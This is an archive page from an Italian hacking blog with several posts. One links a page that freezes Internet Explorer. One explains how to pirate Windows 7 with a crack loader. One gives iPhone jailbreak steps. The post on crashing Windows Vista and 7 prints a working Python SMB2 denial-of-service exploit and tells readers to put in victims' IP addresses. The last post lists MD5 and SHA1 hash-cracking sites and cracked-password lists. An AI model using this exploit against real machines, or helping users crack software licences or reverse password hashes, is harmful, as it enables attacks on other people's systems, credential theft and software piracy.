Archivi 'Hacking' Categoria
Bug DDoS su Internet Explorer

L’8/11/09 è stata scoperto un nuovo bug su alcune versioni del browser by Microsoft: Internet Explorer.
Esso è afflitto da una vulnerabilità “Denial of Service” (DDoS) trovata da MustLive che ha prontamente informato la Microsoft.
Le versioni vulnerabili a questo tipo di attacco sono:
Internet Explorer 6 (6.0.2900.2180),, Internet Explorer 7 (7.0.6000.16711),, versioni precedenti (e possibili prossime versioni).
L’exploit consiste nel bloccare il browser visitando uan pagina apposita senza permettere la sua chiusura se non terminando il processo col TaskManager.
Potete testarlo a questo link.
P.S. NON E’ DANNOSO,, VI ANDRA’ SOLO IN TILT INTERNET EXPLORER
Tags: bug, bug su IE, DDoS, Denial of Service, exploit, internet explorer buggato, MustLive, vulnerabilità DDoAS su internet explorer
Crack Windows 7 Seven

[LEGGERE ATTENTAMENTE I DISCLAIMER]
Devo dirlo la Microsoft ha fatto davvero un bel lavoro con Windows Seven poiché ha lasciato il kernel di Vista con la differenza di alleggerirlo parecchio infatti io stesso lo sto provando e non mi dà alcun problema.
Niente schermate blu,, crash e il boot-loader è quasi immediatato e soprattutto hanno reso questo nuovo sistema operativo un aggiornamento di quello precedente.
C’è un solo problema che ha sempre accompagnato i prodotti Microsoft… Il costo,, perché non è possibile chiedere 100€ per un O.S. ma per fortuna si può risolvere questa “pecca”
Inserite il CD di installazione di Windows Seven e riavviate il PC (oppure potete avviarlo anche normalmente ma non vi conviene) scegliete la lingua,, e settate le impostazioni,, quando vi chiederà di inserire il seriale voi non scrivete niente e andate avanti utilizzando la versione di prova,, poi vi verrà chiesto se attivare gli aggiornamenti “Windows Update” e clickate su “Decidi in seguito”.
Terminata l’installazione scaricate questo Loader per crackare e ottenere la copia definitiva del vostro Windows 7,, la password è:
Securityspl0its
Aprite il Loader,, selezionate il vostro modello di PC e se non è presente clickate su “ATI” poi clickate su “Install/Remove Loader”,, a questo punto il vostro computer si riavvierà automaticamente e avrete la vostra copia definitiva di Windows Seven… Riattivate gli aggiornamenti automatici e siete a posto
Tags: craccare windows 7, craccare windows seven, crack, crack per windows 7, crack per windows seven, crackare windows 7, crackare windows seven, download, download gratis, hotfile, key windows 7, key windows seven, keygen, loader, loader per windows 7, loader per windows seven, microsoft, ottenere copia definitiva windows 7, ottenere copia defintiva windows seven, serial windows seven, seriale windows 7, seriale windows seven, user e password windows 7, user e password windows seven, Window$
Sbloccare iPod Touch e iPhone

Numerosi programmi attraverso installer,, e tantissime ultili funzioni per sfruttare al meglio l’hardware di un iPhone / iPod Touch a patto che esso venga sbloccato
Per prima cosa aggiornate all’ultima versione rilasciata,, dopo per sbloccare l’iPhone / iPod Touch ci serve ZiPhone scaricabile a questo LINK.
Scollegare iTunes e installare ZiPhone appena fatto cercare il tasto “jailbreak only touch” premerlo e aspettare che sblocchi,, frattanto compariranno delle scritte,, quando la barra verde sarà completa hai ufficialmente sbloccato il tuo iPhone / iPod Touch
Premetto che si potrebbe danneggiare il firmware del nostro iPhone / iPod Touch ma non c’è problema perché se ciò dovesse accadere procederemo col “Ripristino di sistema” che si può effettuare in questo modo se il nostro processo di sblocco vada male:
Collegare l’iPhone / iPod Touch ad iTunes e tenere premuto il tasto HOME e ON/OFF/HOLD per un venti secondi circa a questo punto si aprirà il menu di ripristino e potremmo “salvare” il nostro gioello
Share & Enjoy
Tags: apple, come craccare iphone, come craccare ipod touch, come crackare iphone, come crackare ipod touch, come sbloccare iphone, come sbloccare ipod touch, craccare iphone, craccare ipod touch, crack iphone, crack ipod touch, crackare iphone, crackare ipod touch, Hacking, iPhone, iPod Touch, Phreaking, sbloccare iphone, sbloccare ipod touch, unlock iphone, unlock ipod touch
Crashare Windows Vista e Windows 7

Il source code in python che posto riesce a far crashare Windows Vista,, Seven… Personalmente non ho testato comunque eccolo qui
Sostituire l’IP_ADDR con gli indirizzi IP delle vittime. BSOD sarà qualsiasi finestra di Windows 7.
#! /Python26/Lib
# When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = “IP_ADDR”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –>
normal value should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″
)
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.send(buff)
s.close()
Tags: crash widnows 7, crash windows seven, crash windows vista, crashare windows 7, crashare windows seven, crashare windows vista, microsoft, Programmazione, programming, python, Window$, windows 7, windows seven, windows vista
MD5 Crack Databases

Un’ottima raccolta di MD5 Crack:
- [site] – [last info / db info]
————————————————-
- http://passcracking.com/ (Register to increase your priority)
- http://md5.thekaine.de/ (Due to much traffic and problems with the performance i have decided to stop this service until i have the time to completly rewrite the system.)
- http://www.md5crack.com
- http://www.hashchecker.com
- http://www.md5decrypter.com
- http://www.md5oogle.com
- http://md5-db.com (The database is approximately 70gb)
- http://md5.xpzone.de (Need Account)
- http://md5.rednoize.com (52,740,637)
- http://gdataonline.com/seekhash.php (1,133,757,582)
- http://www.tmto.org/?category=main&page=search_md5 (306.000.000.000)
- http://www.milw0rm.com/cracker/insert.php (Milw0rm Cracker db)
- http://b-con.us/pages/md5.php (A javascript MD5 “live” calculator)
- http://blacklight.gotdns.org/cracker/crack.php (2,456,115)
- http://darkc0de.com/database/md5lookup.html ( Include md5decrypter.com – passcracking.ru – milw0rm.com – gdataonline.com – md5.rednoize.com)
- Perl Script: MD5 Brute Forcer
—————————————————————–
CRACKED PASSWORD LIST
—————————————————————–
http://www.md5oogle.com/md5hashes.php
http://www.hashchecker.com/?_sls=hash_list&_from=1
http://www.milw0rm.com/cracker/list.php
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
md5:
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ – Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/in…;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/
Tags: cracker, hash, lista siti m5d cracker, MD5 Crack, md5 cracker, milw0rm, passacracking





